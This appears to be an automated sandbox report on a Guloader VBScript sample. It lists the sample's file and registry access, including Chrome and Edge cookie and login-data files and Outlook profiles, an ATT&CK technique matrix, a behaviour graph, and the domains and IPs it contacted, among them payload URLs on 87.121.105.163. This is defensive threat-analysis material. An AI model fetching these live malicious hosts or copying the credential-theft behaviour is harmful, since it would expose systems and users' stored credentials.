        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.3309988573.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2821245767.0000000025220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2802296347.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.3309922219.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.3309988573.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2821245767.0000000025220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2802296347.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.3309922219.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information321
        Scripting
        Valid Accounts11
        Windows Management Instrumentation
        321
        Scripting
        1
        Abuse Elevation Control Mechanism
        1
        Deobfuscate/Decode Files or Information
        1
        OS Credential Dumping
        2
        File and Directory Discovery
        Remote Services1
        Archive Collected Data
        4
        Ingress Tool Transfer
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        1
        Abuse Elevation Control Mechanism
        LSASS Memory14
        System Information Discovery
        Remote Desktop Protocol1
        Data from Local System
        1
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts11
        Command and Scripting Interpreter
        1
        Registry Run Keys / Startup Folder
        311
        Process Injection
        4
        Obfuscated Files or Information
        Security Account Manager1
        Query Registry
        SMB/Windows Admin Shares1
        Email Collection
        3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts2
        PowerShell
        Login Hook1
        Registry Run Keys / Startup Folder
        1
        Software Packing
        NTDS121
        Security Software Discovery
        Distributed Component Object ModelInput Capture3
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets1
        Process Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Masquerading
        Cached Domain Credentials31
        Virtualization/Sandbox Evasion
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
        Virtualization/Sandbox Evasion
        DCSync1
        Application Window Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
        Process Injection
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Rundll32
        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431505 Sample: FTG_PD_04024024001.vbs Startdate: 25/04/2024 Architecture: WINDOWS Score: 100 46 www.tyaer.com 2->46 48 www.megabet303.lol 2->48 50 www.oyoing.com 2->50 62 Snort IDS alert for network traffic 2->62 64 Multi AV Scanner detection for domain / URL 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 6 other signatures 2->68 12 wscript.exe 1 2->12         started        15 wab.exe 3 1 2->15         started        17 wab.exe 1 2->17         started        19 rundll32.exe 2->19         started        signatures3 process4 signatures5 92 VBScript performs obfuscated calls to suspicious functions 12->92 94 Suspicious powershell command line found 12->94 96 Wscript starts Powershell (via cmd or directly) 12->96 98 3 other signatures 12->98 21 powershell.exe 14 19 12->21         started        process6 dnsIp7 52 87.121.105.163, 49706, 49713, 80 NET1-ASBG Bulgaria 21->52 70 Suspicious powershell command line found 21->70 72 Very long command line found 21->72 74 Found suspicious powershell code related to unpacking or dynamic code loading 21->74 25 powershell.exe 17 21->25         started        28 conhost.exe 21->28         started        30 cmd.exe 1 21->30         started        signatures8 process9 signatures10 80 Writes to foreign memory regions 25->80 82 Found suspicious powershell code related to unpacking or dynamic code loading 25->82 32 wab.exe 6 25->32         started        35 cmd.exe 1 25->35         started        process11 signatures12 58 Maps a DLL or memory area into another process 32->58 37 lgoTSqyYpvNuVXUkRnDp.exe 32->37 injected 60 Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes) 35->60 process13 dnsIp14 54 www.tyaer.com 47.91.88.207, 49717, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 37->54 56 www.oyoing.com 127.0.0.1 unknown unknown 37->56 76 Maps a DLL or memory area into another process 37->76 78 Found direct / indirect Syscall (likely to bypass EDR) 37->78 41 AtBroker.exe 1 13 37->41         started        signatures15 process16 signatures17 84 Tries to steal Mail credentials (via file / registry access) 41->84 86 Tries to harvest and steal browser information (history, passwords, etc) 41->86 88 Modifies the context of a thread in another process (thread injection) 41->88 90 Maps a DLL or memory area into another process 41->90 44 firefox.exe 41->44         started        process18

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        FTG_PD_04024024001.vbs8%ReversingLabsScript-WScript.Trojan.Guloader
        FTG_PD_04024024001.vbs3%VirustotalBrowse
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        bg.microsoft.map.fastly.net0%VirustotalBrowse
        www.oyoing.com10%VirustotalBrowse
        www.tyaer.com11%VirustotalBrowse
        www.megabet303.lol2%VirustotalBrowse
        SourceDetectionScannerLabelLink
        http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
        http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
        http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
        http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
        http://www.e-me.lv/repository00%URL Reputationsafe
        http://www.acabogacia.org/doc00%URL Reputationsafe
        http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
        http://ocsp.suscerte.gob.ve00%URL Reputationsafe
        http://www.postsignum.cz/crl/psrootqca2.crl020%URL Reputationsafe
        http://crl.dhimyotis.com/certignarootca.crl00%URL Reputationsafe
        http://www.chambersign.org10%URL Reputationsafe
        http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
        http://www.suscerte.gob.ve/lcr0#0%URL Reputationsafe
        http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz00%URL Reputationsafe
        http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
        http://postsignum.ttc.cz/crl/psrootqca2.crl00%URL Reputationsafe
        http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
        http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
        http://crl1.comsign.co.il/crl/comsignglobalrootca.crl00%URL Reputationsafe
        http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
        http://www.suscerte.gob.ve/dpc00%URL Reputationsafe
        http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
        http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
        http://www.sk.ee/cps/00%URL Reputationsafe
        http://crl.postsignum.cz/crl/psrootqca4.crl020%URL Reputationsafe
        http://policy.camerfirma.com00%URL Reputationsafe
        http://www.ssc.lt/cps030%URL Reputationsafe
        http://ocsp.pki.gva.es00%URL Reputationsafe
        http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
        http://ca.mtin.es/mtin/ocsp00%URL Reputationsafe
        http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
        http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf00%URL Reputationsafe
        http://web.ncdc.gov.sa/crl/nrcacomb1.crl00%URL Reputationsafe
        http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
        http://www.dnie.es/dpc00%URL Reputationsafe
        http://www.dnie.es/dpc00%URL Reputationsafe
        http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf00%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        http://ca.mtin.es/mtin/DPCyPoliticas00%URL Reputationsafe
        https://repository.tsp.zetes.com00%URL Reputationsafe
        http://www.globaltrust.info00%URL Reputationsafe
        http://www.certplus.com/CRL/class3TS.crl00%URL Reputationsafe
        http://ac.economia.gob.mx/last.crl0G0%URL Reputationsafe
        https://www.catcert.net/verarrel0%URL Reputationsafe
        http://www.disig.sk/ca0f0%URL Reputationsafe
        http://www.sk.ee/juur/crl/00%URL Reputationsafe
        http://crl.chambersign.org/chambersignroot.crl00%URL Reputationsafe
        http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
        http://certs.oati.net/repository/OATICA2.crl00%URL Reputationsafe
        http://crl.oces.trust2408.com/oces.crl00%URL Reputationsafe
        http://www.quovadis.bm00%URL Reputationsafe
        http://crl.ssc.lt/root-a/cacrl.crl00%URL Reputationsafe
        http://www.defence.gov.au/pki00%Avira URL Cloudsafe
        http://www.globaltrust.info0=0%Avira URL Cloudsafe
        http://87.121.105.163/EYioOXUtWs45.binM0%Avira URL Cloudsafe
        http://certs.oaticerts.com/repository/OATICA2.crl0%URL Reputationsafe
        http://certs.oati.net/repository/OATICA2.crt00%URL Reputationsafe
        http://www.accv.es000%URL Reputationsafe
        http://www.accv.es000%URL Reputationsafe
        http://www.pkioverheid.nl/policies/root-policy-G200%URL Reputationsafe
        https://www.netlock.net/docs0%URL Reputationsafe
        http://www.e-trust.be/CPS/QNcerts0%URL Reputationsafe
        http://ocsp.ncdc.gov.sa00%URL Reputationsafe
        http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
        http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl00%URL Reputationsafe
        http://crl2.postsignum.cz/crl/psrootqca4.crl010%URL Reputationsafe
        http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl00%URL Reputationsafe
        http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl00%URL Reputationsafe
        http://web.ncdc.gov.sa/crl/nrcaparta1.crl0%URL Reputationsafe
        http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;0%URL Reputationsafe
        https://repository.luxtrust.lu00%URL Reputationsafe
        http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        http://www.acabogacia.org00%URL Reputationsafe
        http://www.uce.gub.uy/acrn/acrn.crl00%URL Reputationsafe
        http://87.121.105.1630%Avira URL Cloudsafe
        http://87.121.105.163/Stereotyperingens72.xsnXRyl40%Avira URL Cloudsafe
        http://87.121.105.163/0%Avira URL Cloudsafe
        http://www.defence.gov.au/pki00%VirustotalBrowse
        http://87.121.105.16318%VirustotalBrowse
        http://87.121.105.163/18%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        bg.microsoft.map.fastly.net
        199.232.214.172
        truefalseunknown
        www.oyoing.com
        127.0.0.1
        truefalseunknown
        www.tyaer.com
        47.91.88.207
        truetrueunknown
        www.megabet303.lol
        unknown
        unknowntrueunknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0wscript.exe, 00000000.00000003.2015316928.000001B66CD67000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        http://www.certplus.com/CRL/class3.crl0wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        http://www.e-me.lv/repository0wscript.exe, 00000000.00000003.2014484947.000001B66CEC0000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://www.acabogacia.org/doc0wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://87.121.105.163/EYioOXUtWs45.binMwab.exe, 00000008.00000002.2806244411.00000000069E8000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://crl.chambersign.org/chambersroot.crl0wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://ocsp.suscerte.gob.ve0wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2015014084.000001B66AF89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014661712.000001B66CDF1000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://www.postsignum.cz/crl/psrootqca2.crl02wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://aka.ms/pscore6lBeqpowershell.exe, 00000005.00000002.2474889182.0000000004DB1000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://crl.dhimyotis.com/certignarootca.crl0wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://www.chambersign.org1wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014585557.000001B66CDF7000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.pkioverheid.nl/policies/root-policy0wscript.exe, 00000000.00000003.2014484947.000001B66CEC0000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://repository.swisssign.com/0wscript.exe, 00000000.00000003.2025795412.000001B66CD62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025577082.000001B66CD31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2051411506.000001B66CD5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048272066.000001B66CD5A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025686902.000001B66CD5B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025331654.000001B66CD0A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2015316928.000001B66CD67000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              http://www.suscerte.gob.ve/lcr0#wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2015014084.000001B66AF89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014661712.000001B66CDF1000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://crl.ssc.lt/root-c/cacrl.crl0wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://postsignum.ttc.cz/crl/psrootqca2.crl0wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlwscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://ca.disig.sk/ca/crl/ca_disig.crl0wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.certplus.com/CRL/class3P.crl0wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016613844.000001B66CEBA000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.suscerte.gob.ve/dpc0wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2015014084.000001B66AF89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014661712.000001B66CDF1000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.certeurope.fr/reference/root2.crl0wscript.exe, 00000000.00000003.2015316928.000001B66CD67000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://www.certplus.com/CRL/class2.crl0wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.disig.sk/ca/crl/ca_disig.crl0wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.defence.gov.au/pki0wscript.exe, 00000000.00000003.2014793443.000001B66CDAE000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2761711892.000001CB10070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2478265897.0000000005E17000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.sk.ee/cps/0wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.globaltrust.info0=wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014585557.000001B66CDF7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://www.anf.eswscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2624324723.000001CB00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2474889182.0000000004DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://crl.postsignum.cz/crl/psrootqca4.crl02wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://pki.registradores.org/normativa/index.htm0wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://policy.camerfirma.com0wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.ssc.lt/cps03wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://ocsp.pki.gva.es0wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.anf.es/es/address-direccion.htmlwscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://www.anf.es/address/)1(0&wscript.exe, 00000000.00000003.2015404722.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016665644.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2474889182.0000000004F04000.00000004.00000800.00020000.00000000.sdmptrue
                              • URL Reputation: malware
                              unknown
                              http://ca.mtin.es/mtin/ocsp0wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
